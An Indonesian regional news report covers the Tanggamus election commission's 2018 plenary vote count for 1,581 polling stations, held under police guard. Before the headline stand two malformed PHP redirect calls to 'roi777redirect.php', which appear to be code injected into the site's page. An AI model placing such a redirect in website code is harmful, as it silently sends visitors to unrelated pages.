header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Pleno Rekapitulasi 1.581 TPS Dahulukan Pilgub, Dilanjutkan Pilbup Tanggamus -
Pleno Rekapitulasi 1.581 TPS Dahulukan Pilgub, Dilanjutkan Pilbup Tanggamus
PROSES REKAPITULASI: Suasana proses rekapitulasi Pleno Terbuka KPU Tanggamus pada Pilkada Serentak 2018 di aula Mapolres Tanggamus, Kamis (5/7) yang akan berlangsung hingga malam hari. (Foto: AYP)

TRANSLAMPUNG.COM, TANGGAMUS – Seperti yang telah dijadwalkan, Komisi Pemilihan Umum Tanggamus hari ini (5/7) menggelar Rapat Pleno Terbuka Rekapitulasi Penetapan dan Pengumuman Penghitungan Suara Tingkat Kabupaten  Pilkada Serentak Tanggamus Tahun 2018. Dengan pertimbangan faktor keamanan, pleno dilaksanakan di aula Mapolres Tanggamus dengan pengawalan ketat aparat gabungan.

Dari pantauan translampung.com di lokasi, proses pleno terkesan cukup lama. Sebab sejak dimulai pukul 09.30 WIB hingga berita awal ini dirilis pukul 15.12 WIB, pleno masih berkutat pada rekapitulasi suara Pemilihan Gubernur (Pilgub) Lampung 12 kecamatan. Di Tanggamus, total ada 20 kecamatan. Sedangkan untuk rekapitulasi Pilbup Tanggamus sama sekali belum tersentuh dengan jumlah sama 20 kecamatan. Sehingga sangat diyakini, pleno terbuka pilgub dan pilbup akan betlangsung hingga Kamis malam.

Dalam sambutan ketika pembukaan pleno, Ketua KPU Tanggamus Otto Yuri Saputra mengatakan, dalam melaksanakan tugas dan kewajiban KPU beserta seluruh jajaran mulai kecamatan sampai di tingkat PPS atau KPPS, melaksanakan UU Nomor 10 Tahun 2016 tentang Pilkada. Serta seluruh tahapan yang dilaksanakan dengan mengacu pada petunjuk teknis pelaksanaan, yaitu PKPU.

Alhamdulillah sudah kami jalani dengan aman dan lancar. Dan itu semua berkat hubungan semua masyarakat yang ada di Kabupaten Tanggamus, semua stakeholder yang ada di Kabupaten Tanggamus. Pada kegiatan ini kami berdasarkan PKPU Nomor 9 Tahun 2018. Dinyatakan bahwa rekapitulasi dilakukan secara berjenjang, mulai dari tingkat paling bawah hingga kabupaten,” ujar Otto.

Dia menjelaskan, pleno hari ini adalah rekapitulasi untuk total 1.581 tempat pemungutan suara (TPS). Jumlah itu tersebar di 302 pekon dan kelurahan yang berada di 20 kecamatan. (ayp)

News Reporter
Kepala Biro Tanggamus